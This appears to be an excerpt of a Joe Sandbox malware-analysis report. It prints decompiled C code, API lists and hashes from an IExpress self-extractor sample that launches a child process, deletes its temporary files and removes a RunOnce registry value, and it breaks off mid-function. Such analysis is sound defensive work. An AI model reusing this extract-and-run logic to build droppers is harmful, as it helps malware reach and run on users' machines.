                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-394614654
                                                                                                                                                                                                                                            • Opcode ID: eedb48513b94008da1a528b1af592f2c33b89c6216a384a6d2e45c15aef5392c
                                                                                                                                                                                                                                            • Instruction ID: b6db20f54a5770bb6dd566dbcb19bb52f17e30fe2b23cae3fe78ea5cf56fef1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eedb48513b94008da1a528b1af592f2c33b89c6216a384a6d2e45c15aef5392c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA11E671B0021077DB249FB96C4EA9B7ED9EF46360B104617B505D7191DE70980687A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 a93fef-a94010 632 a9410a-a9411a call a96ce0 631->632 633 a94016-a9403b CreateProcessA 631->633 634 a94041-a9406e WaitForSingleObject GetExitCodeProcess 633->634 635 a940c4-a94101 call a96285 GetLastError FormatMessageA call a944b9 633->635 638 a94091 call a9411b 634->638 639 a94070-a94077 634->639 647 a94106 635->647 646 a94096-a940b8 CloseHandle * 2 638->646 639->638 642 a94079-a9407b 639->642 642->638 645 a9407d-a94089 642->645 645->638 648 a9408b 645->648 649 a94108 646->649 650 a940ba-a940c0 646->650 647->649 648->638 649->632 650->649 651 a940c2 650->651 651->647
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00A93FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00A96CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0xa98a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0xa99a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0xa99a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A9411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0xa99a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a93fef
                                                                                                                                                                                                                                            0x00a93ffa
                                                                                                                                                                                                                                            0x00a94001
                                                                                                                                                                                                                                            0x00a94008
                                                                                                                                                                                                                                            0x00a9400a
                                                                                                                                                                                                                                            0x00a9400b
                                                                                                                                                                                                                                            0x00a94010
                                                                                                                                                                                                                                            0x00a9410a
                                                                                                                                                                                                                                            0x00a9411a
                                                                                                                                                                                                                                            0x00a9411a
                                                                                                                                                                                                                                            0x00a9401c
                                                                                                                                                                                                                                            0x00a9401d
                                                                                                                                                                                                                                            0x00a9401e
                                                                                                                                                                                                                                            0x00a9401f
                                                                                                                                                                                                                                            0x00a94033
                                                                                                                                                                                                                                            0x00a9403b
                                                                                                                                                                                                                                            0x00a940ca
                                                                                                                                                                                                                                            0x00a940e9
                                                                                                                                                                                                                                            0x00a940f8
                                                                                                                                                                                                                                            0x00a94101
                                                                                                                                                                                                                                            0x00a94106
                                                                                                                                                                                                                                            0x00a94106
                                                                                                                                                                                                                                            0x00a94108
                                                                                                                                                                                                                                            0x00a94108
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94108
                                                                                                                                                                                                                                            0x00a94049
                                                                                                                                                                                                                                            0x00a9405c
                                                                                                                                                                                                                                            0x00a94062
                                                                                                                                                                                                                                            0x00a94068
                                                                                                                                                                                                                                            0x00a9406e
                                                                                                                                                                                                                                            0x00a94070
                                                                                                                                                                                                                                            0x00a94077
                                                                                                                                                                                                                                            0x00a9407f
                                                                                                                                                                                                                                            0x00a94089
                                                                                                                                                                                                                                            0x00a9408b
                                                                                                                                                                                                                                            0x00a9408b
                                                                                                                                                                                                                                            0x00a94089
                                                                                                                                                                                                                                            0x00a94077
                                                                                                                                                                                                                                            0x00a94091
                                                                                                                                                                                                                                            0x00a9409c
                                                                                                                                                                                                                                            0x00a940a8
                                                                                                                                                                                                                                            0x00a940b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a940c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a940c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00A94033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A94049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00A9405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A9409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A940A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A940DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A940E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: b1b0db4a7c758e8f11705375a9a80065e8f37ba74dabf1866df49998227ef6a5
                                                                                                                                                                                                                                            • Instruction ID: 649ba6ec411f29755cb86668b98fbbd553266052fdb9c4b67712aa9d0dc5b667
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1b0db4a7c758e8f11705375a9a80065e8f37ba74dabf1866df49998227ef6a5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E31AF31740208ABEF209BA5DC49FAB77B8EB98700F2002ABF505D2160CE344C83CA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 652 a951e5-a9520b call a9468f LocalAlloc 655 a9522d-a9523c call a9468f 652->655 656 a9520d-a95228 call a944b9 call a96285 652->656 662 a9523e-a95260 call a944b9 LocalFree 655->662 663 a95262-a95270 lstrcmpA 655->663 671 a952b0 656->671 662->671 664 a9527e-a9529c call a944b9 LocalFree 663->664 665 a95272-a95273 LocalFree 663->665 674 a9529e-a952a4 664->674 675 a952a6 664->675 669 a95279-a9527c 665->669 672 a952b2-a952b5 669->672 671->672 674->669 675->671
                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A951E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E00A9468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E00A9468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E00A944B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0xa99124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x00a951fb
                                                                                                                                                                                                                                            0x00a95207
                                                                                                                                                                                                                                            0x00a9520b
                                                                                                                                                                                                                                            0x00a9523c
                                                                                                                                                                                                                                            0x00a95268
                                                                                                                                                                                                                                            0x00a95270
                                                                                                                                                                                                                                            0x00a9528b
                                                                                                                                                                                                                                            0x00a95293
                                                                                                                                                                                                                                            0x00a9529c
                                                                                                                                                                                                                                            0x00a952a6
                                                                                                                                                                                                                                            0x00a952b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a952b0
                                                                                                                                                                                                                                            0x00a9529e
                                                                                                                                                                                                                                            0x00a95279
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9527b
                                                                                                                                                                                                                                            0x00a95273
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95273
                                                                                                                                                                                                                                            0x00a9524a
                                                                                                                                                                                                                                            0x00a95250
                                                                                                                                                                                                                                            0x00a95256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95256
                                                                                                                                                                                                                                            0x00a95219
                                                                                                                                                                                                                                            0x00a95223
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95250
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: 90bd9056e41e51fab5296e7db5ea6eec52023d6c5d3851427d8dae0fab89fa76
                                                                                                                                                                                                                                            • Instruction ID: d13b387dfa6694a32ffb6a6644f15a638ebaaab004fe25faf94247dee9a53c51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90bd9056e41e51fab5296e7db5ea6eec52023d6c5d3851427d8dae0fab89fa76
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF11E6B1B006017BDF55ABB55D4AF7B61EDEBDD340B10442FB602D5190DE788C024264
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E00A952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0xa991e0; // 0x7c8d90
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0xa98a24 == 0 &&  *0xa99a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0xa98a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0xa98a24 == 0 &&  *0xa99a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00A91781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            					if(( *0xa99a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E00A965E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00A92390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0xa98a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0xa99a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00A91FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0xa98a20 =  *0xa98a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00A96CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a952b6
                                                                                                                                                                                                                                            0x00a952b6
                                                                                                                                                                                                                                            0x00a952b6
                                                                                                                                                                                                                                            0x00a952c1
                                                                                                                                                                                                                                            0x00a952c8
                                                                                                                                                                                                                                            0x00a952cb
                                                                                                                                                                                                                                            0x00a952cc
                                                                                                                                                                                                                                            0x00a952d4
                                                                                                                                                                                                                                            0x00a952d6
                                                                                                                                                                                                                                            0x00a952d7
                                                                                                                                                                                                                                            0x00a952de
                                                                                                                                                                                                                                            0x00a952e0
                                                                                                                                                                                                                                            0x00a952f2
                                                                                                                                                                                                                                            0x00a952fa
                                                                                                                                                                                                                                            0x00a952fa
                                                                                                                                                                                                                                            0x00a95302
                                                                                                                                                                                                                                            0x00a95305
                                                                                                                                                                                                                                            0x00a9530c
                                                                                                                                                                                                                                            0x00a95312
                                                                                                                                                                                                                                            0x00a95316
                                                                                                                                                                                                                                            0x00a95316
                                                                                                                                                                                                                                            0x00a95317
                                                                                                                                                                                                                                            0x00a9531c
                                                                                                                                                                                                                                            0x00a9531f
                                                                                                                                                                                                                                            0x00a95333
                                                                                                                                                                                                                                            0x00a95345
                                                                                                                                                                                                                                            0x00a95351
                                                                                                                                                                                                                                            0x00a95359
                                                                                                                                                                                                                                            0x00a95359
                                                                                                                                                                                                                                            0x00a95363
                                                                                                                                                                                                                                            0x00a95369
                                                                                                                                                                                                                                            0x00a9536f
                                                                                                                                                                                                                                            0x00a95374
                                                                                                                                                                                                                                            0x00a95374
                                                                                                                                                                                                                                            0x00a95381
                                                                                                                                                                                                                                            0x00a95387
                                                                                                                                                                                                                                            0x00a95387
                                                                                                                                                                                                                                            0x00a9538f
                                                                                                                                                                                                                                            0x00a953a0

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(007C8D90,00000080,?,00000000), ref: 00A952F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(007C8D90), ref: 00A952FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(007C8D90,?,00000000), ref: 00A95305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(007C8D90), ref: 00A9530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00A911FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A95363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A95334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-1610346413
                                                                                                                                                                                                                                            • Opcode ID: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                                                            • Instruction ID: a312f06bb88c8a8486a8d93cdd3a52ee05c340da98bff0678e48864552fdbb6a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9721AE31B00614EBDF22DBB4ED1AB6A77E4FB14790F04025BE8469A5A0CFB45C86CB84
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A91FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0xa98530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a91fee
                                                                                                                                                                                                                                            0x00a92005
                                                                                                                                                                                                                                            0x00a9200d
                                                                                                                                                                                                                                            0x00a92017
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92020
                                                                                                                                                                                                                                            0x00a9200d
                                                                                                                                                                                                                                            0x00a92029

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A9538C,?,?,00A9538C), ref: 00A92005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(00A9538C,wextract_cleanup2,?,?,00A9538C), ref: 00A92017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00A9538C,?,?,00A9538C), ref: 00A92020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                            • Opcode ID: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                                                            • Instruction ID: 143594f1e4402c041475459e99bee38d147c74548b5dab5d26b20b65bf4c800c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E01A30750218BBDB218BD0AC0AF697AA9F711741F100197B905A0060EF655E15D645
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A94CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
